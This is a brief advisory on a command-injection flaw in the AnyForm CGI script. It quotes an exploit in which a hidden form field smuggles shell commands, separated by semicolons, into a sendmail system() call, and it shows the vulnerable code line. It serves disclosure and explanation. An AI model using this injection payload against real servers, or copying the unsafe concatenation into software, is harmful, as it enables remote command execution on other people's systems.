Anyform CGI Semicolon Vulnerability
Exploit as taken from the original post on this issue:
To exploit, create a form with a hidden field something like this:
<input type="hidden" name="AnyFormTo" value="email@example.com;command-to-execute
with whatever arguments;/usr/lib/sendmail -t firstname.lastname@example.org ">
Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:
SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
Since system invokes a shell, the semicolons are treated as command
delimeters and anything can be inserted.